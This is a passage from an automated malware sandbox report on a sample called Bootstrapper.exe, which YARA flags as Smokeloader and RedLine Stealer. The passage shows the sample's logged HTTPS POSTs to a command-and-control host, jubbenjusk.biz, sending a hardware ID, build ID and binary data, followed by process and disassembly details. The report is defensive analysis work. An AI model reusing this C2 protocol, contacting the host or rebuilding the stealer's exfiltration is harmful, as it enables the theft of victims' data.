                                                    2025-01-12 06:10:23 UTC15331OUTData Raw: 2d 2d 5a 53 4c 4f 33 45 57 57 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 5a 53 4c 4f 33 45 57 57 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 53 4c 4f 33 45 57 57 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 0d 0a 2d 2d 5a 53 4c 4f 33 45 57 57 32 0d 0a 43 6f 6e 74 65
                                                    Data Ascii: --ZSLO3EWW2Content-Disposition: form-data; name="hwid"7AA4328D8341AA22B960CC18D99B375A--ZSLO3EWW2Content-Disposition: form-data; name="pid"3--ZSLO3EWW2Content-Disposition: form-data; name="lid"HpOoIh--2a727a032c4d--ZSLO3EWW2Conte
                                                    2025-01-12 06:10:23 UTC4585OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: 2+?2+?o?Mp5p_oI
                                                    2025-01-12 06:10:24 UTC1131INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:24 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=lk98j1hc46obggj7l9n8v46mhm; expires=Wed, 07 May 2025 23:57:02 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EjeOdmPaM1AxNBpPcb%2FpEyyhe7vjIdm5zkq41zAKRftKhz8lTZxrQw6aY7mLigyRXXP4%2FpzLg33RGfcW4Q%2BfHLyAi7Pvcf7yWI3B%2FzlWDleDKvdrzDSa22LrvQyEH9bRMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbb1081342aa-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1731&rtt_var=655&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2833&recv_bytes=20867&delivery_rate=1663817&cwnd=201&unsent_bytes=0&cid=55ea967a2f2ed39f&ts=643&x=0"
                                                    2025-01-12 06:10:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                    Data Ascii: fok 8.46.123.189
                                                    2025-01-12 06:10:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.649737172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:25 UTC279OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=BD17OYCX7FQFJZ65XN
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1376
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:25 UTC1376OUTData Raw: 2d 2d 42 44 31 37 4f 59 43 58 37 46 51 46 4a 5a 36 35 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 42 44 31 37 4f 59 43 58 37 46 51 46 4a 5a 36 35 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 44 31 37 4f 59 43 58 37 46 51 46 4a 5a 36 35 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37
                                                    Data Ascii: --BD17OYCX7FQFJZ65XNContent-Disposition: form-data; name="hwid"7AA4328D8341AA22B960CC18D99B375A--BD17OYCX7FQFJZ65XNContent-Disposition: form-data; name="pid"1--BD17OYCX7FQFJZ65XNContent-Disposition: form-data; name="lid"HpOoIh--2a727
                                                    2025-01-12 06:10:25 UTC1135INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:25 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=6une3e8lhgvd73qnljulf1okui; expires=Wed, 07 May 2025 23:57:04 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4CvkZODKooxT6JNRiCkOEMld%2FaxCvAUnUYj1A7O9NgRLreiFVb%2BSeOwQ43%2B4QWCU%2Fjeur30bbHyWLbKFb2LRTi7w4mCeFvo9wW2ERL7%2BdN5%2BfizRFCc6A4Ey%2F%2BfUmBeOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbbda8b75e72-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1702&rtt_var=644&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2291&delivery_rate=1715628&cwnd=32&unsent_bytes=0&cid=656b70b3ebe511ed&ts=460&x=0"
                                                    2025-01-12 06:10:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                    Data Ascii: fok 8.46.123.189
                                                    2025-01-12 06:10:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.649743172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:26 UTC277OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: multipart/form-data; boundary=TPXM9QB19SRT6UAF
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 1106
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:26 UTC1106OUTData Raw: 2d 2d 54 50 58 4d 39 51 42 31 39 53 52 54 36 55 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 54 50 58 4d 39 51 42 31 39 53 52 54 36 55 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 50 58 4d 39 51 42 31 39 53 52 54 36 55 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34
                                                    Data Ascii: --TPXM9QB19SRT6UAFContent-Disposition: form-data; name="hwid"7AA4328D8341AA22B960CC18D99B375A--TPXM9QB19SRT6UAFContent-Disposition: form-data; name="pid"1--TPXM9QB19SRT6UAFContent-Disposition: form-data; name="lid"HpOoIh--2a727a032c4
                                                    2025-01-12 06:10:27 UTC1128INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:26 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=thdbo5n00p9945p36s4g3b3o17; expires=Wed, 07 May 2025 23:57:05 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wCOSGMpAgWnKyLdI0gSYaOKKTsgrZkdmoIKYfcF2Y%2FjUnnVV%2B7txla4LTOJeeVQgfDyAdsmwB0384cLROn3xU%2BfQYZ8vbChy50ZkMAKiJuzF50te7UcECMl4ZEz%2FJ49NIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbc43d7f41b5-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1586&rtt_var=619&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2019&delivery_rate=1732937&cwnd=207&unsent_bytes=0&cid=0ca9e842422e3f23&ts=493&x=0"
                                                    2025-01-12 06:10:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                    Data Ascii: fok 8.46.123.189
                                                    2025-01-12 06:10:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.649749172.67.219.1814431036C:\Users\user\Desktop\Bootstrapper.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-12 06:10:27 UTC263OUTPOST /api HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                    Content-Length: 121
                                                    Host: jubbenjusk.biz
                                                    2025-01-12 06:10:27 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 37 41 41 34 33 32 38 44 38 33 34 31 41 41 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                    Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7AA4328D8341AA22B960CC18D99B375A
                                                    2025-01-12 06:10:27 UTC1128INHTTP/1.1 200 OK
                                                    Date: Sun, 12 Jan 2025 06:10:27 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: PHPSESSID=of1jfratrq8af5e0pjcac4unv1; expires=Wed, 07 May 2025 23:57:06 GMT; Max-Age=9999999; path=/
                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    X-Frame-Options: DENY
                                                    X-Content-Type-Options: nosniff
                                                    X-XSS-Protection: 1; mode=block
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OU6uhLMJdftBd1UwFpX3WwTR%2Fo4WKHqB6vklcJj50neX2InWF8KxaEuSLq2oWLGwVkokpGvn0LrYgd0y5rSbRfkEdzIFjcOjiiVVudfK7lk%2B0Ilc2vRjButeIqjf%2B%2FHN6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 900afbca9ebd4235-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1608&rtt_var=608&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1020&delivery_rate=1792510&cwnd=248&unsent_bytes=0&cid=72b3781112ff910a&ts=439&x=0"
                                                    2025-01-12 06:10:27 UTC54INData Raw: 33 30 0d 0a 67 2f 38 6d 59 56 52 41 72 4e 32 67 38 45 45 4e 30 6e 70 44 45 5a 34 43 4e 61 30 32 46 6b 66 34 71 53 41 70 7a 35 73 6e 55 65 37 59 6f 67 3d 3d 0d 0a
                                                    Data Ascii: 30g/8mYVRArN2g8EEN0npDEZ4CNa02Fkf4qSApz5snUe7Yog==
                                                    2025-01-12 06:10:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:01:10:14
                                                    Start date:12/01/2025
                                                    Path:C:\Users\user\Desktop\Bootstrapper.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Bootstrapper.exe"
                                                    Imagebase:0x400000
                                                    File size:404'992 bytes
                                                    MD5 hash:A9370DF5FB60672577FD727E3E798E75
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:01:10:28
                                                    Start date:12/01/2025
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900
                                                    Imagebase:0x80000
                                                    File size:483'680 bytes
                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Non-executed Functions

                                                      Function 02F07003 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000003.2265953787.0000000002F07000.00000004.00000800.00020000.00000000.sdmp, Offset: 02F07000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_3_2f06000_Bootstrapper.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 2$8$:$<
                                                      • API String ID: 0-2010585708
                                                      • Opcode ID: 67d60451abf46a8440329f7e17f9384f2203ee1c00ecdfc304c394ed18c3e430
                                                      • Instruction ID: 9334ca420581606e17f75547198c5e365f68d9162b45647e32704c29d22ca51e
                                                      • Opcode Fuzzy Hash: 67d60451abf46a8440329f7e17f9384f2203ee1c00ecdfc304c394ed18c3e430
                                                      • Instruction Fuzzy Hash: 8981CF9650E3C01FE71397704C79A50BFB52E23148B1E82CFC4C98E5E7D759A90AE326